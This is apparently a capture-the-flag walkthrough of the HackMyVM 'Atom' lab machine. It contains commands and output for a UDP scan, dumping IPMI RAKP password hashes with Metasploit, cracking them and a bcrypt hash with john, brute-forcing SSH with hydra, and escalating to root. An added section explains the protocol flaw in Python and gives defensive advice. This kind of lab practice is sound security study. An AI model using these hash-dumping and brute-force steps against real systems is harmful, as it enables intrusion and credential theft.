The HackMyVM machine Atom; download at https://hackmyvm.eu/machines/machine.php?vm=Atom
A normal nmap scan only finds port 22, which is very odd. Getting stuck at the very first step is frustrating; the boxes cromiphi builds always have a few little traps in them!
└─$ nmap -sV -sC -Pn -oN port.log 192.168.56.118
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-22 20:20 CST
Nmap scan report for 192.168.56.118
Host is up (0.0026s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
| 256 e7:ce:f2:f6:5d:a7:47:5a:16:2f:90:07:07:33:4e:a9 (ECDSA)
|_ 256 09:db:b7:e8:ee:d4:52:b8:49:c3:cc:29:a5:6e:07:35 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
A UDP scan is required here. UDP scans are usually slow, so the --version-intensity 0 -F -T4 options are added.
└─$ sudo nmap -sU -sV --version-intensity 0 -F -n -T4 192.168.56.118
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-22 20:24 CST
Nmap scan report for 192.168.56.118
Host is up (0.0013s latency).
Not shown: 60 open|filtered udp ports (no-response), 39 closed udp ports (port-unreach)
PORT STATE SERVICE VERSION
623/udp open asf-rmcp
MAC Address: 08:00:27:E6:C5:CC (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.39 seconds
Another port, 623, shows up. Searching online shows that asf-rmcp (IPMI) is vulnerable, and msfconsole can be used to exploit it.
└─$ msfconsole -q
msf6 > search ipmi
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/ipmi/ipmi_cipher_zero 2013-06-20 normal No IPMI 2.0 Cipher Zero Authentication Bypass Scanner
1 auxiliary/scanner/ipmi/ipmi_dumphashes 2013-06-20 normal No IPMI 2.0 RAKP Remote SHA1 Password Hash Retrieval
2 auxiliary/scanner/ipmi/ipmi_version . normal No IPMI Information Discovery
The ipmi_dumphashes module dumps password hashes. With the default username and password lists it directly recovers the admin password, but that username and password do not get us any further.
[*] Using auxiliary/scanner/ipmi/ipmi_dumphashes
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set rhosts 192.168.56.118
rhosts => 192.168.56.118
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > show options
Module options (auxiliary/scanner/ipmi/ipmi_dumphashes):
Name Current Setting Required Description
---- --------------- -------- -----------
CRACK_COMMON true yes Automatically crack common passwords as they are obtained
OUTPUT_HASHCAT_FILE no Save captured password hashes in hashcat format
OUTPUT_JOHN_FILE no Save captured password hashes in john the ripper format
PASS_FILE /usr/share/metasploit-framework/data/wordlists/ipmi_passwords.txt yes File containing common passwords for offline cracking, one per line
RHOSTS 192.168.56.118 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 623 yes The target port
SESSION_MAX_ATTEMPTS 5 yes Maximum number of session retries, required on certain BMCs (HP iLO 4, etc)
SESSION_RETRY_DELAY 5 yes Delay between session retries in seconds
THREADS 1 yes The number of concurrent threads (max one per host)
USER_FILE /usr/share/metasploit-framework/data/wordlists/ipmi_users.txt yes File containing usernames, one per line
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > run
[+] 192.168.56.118:623 - IPMI - Hash found: admin:c6aeec6f042100005a600631aefe49f73bcceaf2d6b63d5d1f747466c5e2878c73e7631cf17874a7a123456789abcdefa123456789abcdef140561646d696e:1655d46ba4eac636a41a2279e1f3b43faa88be91
[+] 192.168.56.118:623 - IPMI - Hash for user 'admin' matches password 'cukorborso'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Set the username wordlist to the larger one from SecLists and run again; this yields password hashes for many users, which we export to a file john can crack.
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set user_file /usr/share/wordlists/seclists/Usernames/Names/names.txt
user_file => /usr/share/wordlists/seclists/Usernames/Names/names.txt
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > run
[+] 192.168.56.118:623 - IPMI - Hash found: admin:9710a506024f00002e6b024cc9d1838b83a4de66665b1329dec62ca1fc02de473299a8f4c3973615a123456789abcdefa123456789abcdef140561646d696e:e473a0a2b2af52a0124de089d2738341fbae0e55
[+] 192.168.56.118:623 - IPMI - Hash for user 'admin' matches password 'cukorborso'
[+] 192.168.56.118:623 - IPMI - Hash found: analiese:b4f761bf84ff000055c6cb90c405384cdc325bd8aa2b3231484d3b2439da3da797dc4fbff2f93d25a123456789abcdefa123456789abcdef1408616e616c69657365:48446921c861594211eeaed52dd758099ab314bd
...
Use john to crack the dumped john_file.
└─$ cat john_file
192.168.56.118 admin:$rakp$c6aeec6f042100005a600631aefe49f73bcceaf2d6b63d5d1f747466c5e2878c73e7631cf17874a7a123456789abcdefa123456789abcdef140561646d696e$1655d46ba4eac636a41a2279e1f3b43faa88be91
192.168.56.118 admin:$rakp$9710a506024f00002e6b024cc9d1838b83a4de66665b1329dec62ca1fc02de473299a8f4c3973615a123456789abcdefa123456789abcdef140561646d696e$e473a0a2b2af52a0124de089d2738341fbae0e55
192.168.56.118 analiese:$rakp$b4f761bf84ff000055c6cb90c405384cdc325bd8aa2b3231484d3b2439da3da797dc4fbff2f93d25a123456789abcdefa123456789abcdef1408616e616c69657365$48446921c861594211eeaed52dd758099ab314bd
192.168.56.118 asia:$rakp$61ebf53f86a20100fb316f3f1b4ebfb343462afaac35a1e7ea81003e4493318f1e6ee5159b19fd18a123456789abcdefa123456789abcdef140461736961$4ad733b1f06afdc260d0834015660b9df0513d64
...
└─$ john john_file
Using default input encoding: UTF-8
Loaded 29 password hashes with 29 different salts (RAKP, IPMI 2.0 RAKP (RMCP+) [HMAC-SHA1 128/128 SSE2 4x])
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
batman! (192.168.56.118 rozalia)
emeralds (192.168.56.118 karlotte)
phones (192.168.56.118 palmer)
Proceeding with incremental:ASCII
090506 (192.168.56.118 saman)
120691 (192.168.56.118 zaylen)
241107 (192.168.56.118 mayeul)
...
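Added example (not from the original write-up) showing why these hashes crack offline: the BMC answers RAKP message 1 with HMAC-SHA1 keyed by the user's password over values the client already knows or chose, so whoever receives RAKP message 2 can test guesses without contacting the BMC again. The parser below assumes only the john_file line format shown above and decodes each line into its IPMI 2.0 RAKP fields:

```python
import hashlib
import hmac

# Privilege level is the low nibble of the RAKP "role" byte; bit 4 means name-only lookup.
PRIV_LEVELS = {1: "CALLBACK", 2: "USER", 3: "OPERATOR", 4: "ADMINISTRATOR", 5: "OEM"}

def parse_john_rakp(line: str):
    """Parse '<host> <user>:$rakp$<salt_hex>$<hmac_hex>' as ipmi_dumphashes writes it.
    Returns (host, fields, salt_bytes, hmac_bytes); fields are the IPMI 2.0 RAKP inputs."""
    host, rest = line.split(maxsplit=1)
    user, field = rest.split(":", 1)
    tag, salt_hex, mac_hex = field.split("$")[1:]
    if tag != "rakp":
        raise ValueError("not a RAKP hash line")
    salt = bytes.fromhex(salt_hex)
    role, ulen = salt[56], salt[57]
    if len(salt) != 58 + ulen:
        raise ValueError("ULENm does not match salt length")
    username = salt[58:].decode("ascii")
    if username != user:
        raise ValueError("username label and salt disagree")
    fields = {
        "sid_m": salt[0:4].hex(),     # remote console session ID
        "sid_c": salt[4:8].hex(),     # BMC session ID
        "rand_m": salt[8:24].hex(),   # remote console random number
        "rand_c": salt[24:40].hex(),  # BMC random number
        "guid_c": salt[40:56].hex(),  # BMC GUID
        "privilege": PRIV_LEVELS.get(role & 0x0F, "RESERVED"),
        "name_only_lookup": bool(role & 0x10),
        "username": username,
    }
    return host, fields, salt, bytes.fromhex(mac_hex)

def rakp2_hmac(password: str, salt: bytes) -> bytes:
    """Auth code the BMC returns in RAKP message 2: HMAC-SHA1 keyed with the user password
    (the spec zero-pads the key to 20 bytes, which HMAC already does for short keys)."""
    return hmac.new(password.encode(), salt, hashlib.sha1).digest()

def password_matches(line: str, password: str) -> bool:
    """Check one guess against one dumped line entirely offline, which is what john does."""
    _host, _fields, salt, mac = parse_john_rakp(line)
    return hmac.compare_digest(rakp2_hmac(password, salt), mac)

# Constructed sample: the first john_file line shown in the walkthrough above.
SAMPLE = ("192.168.56.118 admin:$rakp$c6aeec6f042100005a600631aefe49f73bcceaf2d6b63d5d"
          "1f747466c5e2878c73e7631cf17874a7a123456789abcdefa123456789abcdef140561646d696e"
          "$1655d46ba4eac636a41a2279e1f3b43faa88be91")
```

Because the weakness is in the protocol design rather than a bug, the defensive fix is to keep UDP/623 off general-purpose networks (or disable IPMI over LAN) and to use long, unique BMC passwords that do not fall to the wordlists seen here.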
Save the usernames and passwords to separate files, then brute-force SSH on port 22.
└─$ hydra -L user.txt -P pass.txt ssh://192.168.56.118
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-07-22 20:43:23
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 672 login tries (l:28/p:24), ~42 tries per task
[DATA] attacking ssh://192.168.56.118:22/
[STATUS] 264.00 tries/min, 264 tries in 00:01h, 410 to do in 00:02h
After logging in over SSH, start privilege escalation. A database file under /var/www/html contains the password hash of the user atom.
onida@atom:/var/www/html$ sqlite3 atom-2400-database.db
SQLite version 3.40.1 2022-12-28 14:03:47
sqlite> .show
echo: off
eqp: off
explain: auto
headers: off
mode: list
nullvalue: ""
output: stdout
colseparator: "|"
rowseparator: "\n"
stats: off
width:
filename: atom-2400-database.db
sqlite> .dump
PRAGMA foreign_keys=OFF;
BEGIN TRANSACTION;
CREATE TABLE login_attempts (
id INTEGER PRIMARY KEY,
ip_address TEXT NOT NULL,
attempt_time INTEGER NOT NULL
);
CREATE TABLE users (
id INTEGER PRIMARY KEY,
username TEXT UNIQUE NOT NULL,
password TEXT NOT NULL
);
INSERT INTO users VALUES(1,'atom','$2y$10$Z1K.4yVakZEY.Qsju3WZzukW/M3fI6BkSohYOiBQqG7pK1F2fH9Cm');
COMMIT;
Cracking it with john yields a password.
└─$ john hash
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
madison (?)
1g 0:00:00:01 DONE 2/3 (2024-07-22 20:50) 0.9615g/s 207.6p/s 207.6c/s 207.6C/s goodluck..stephen
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
With this password we get root.
onida@atom:/var/www/html$ su
Password:
root@atom:/var/www/html#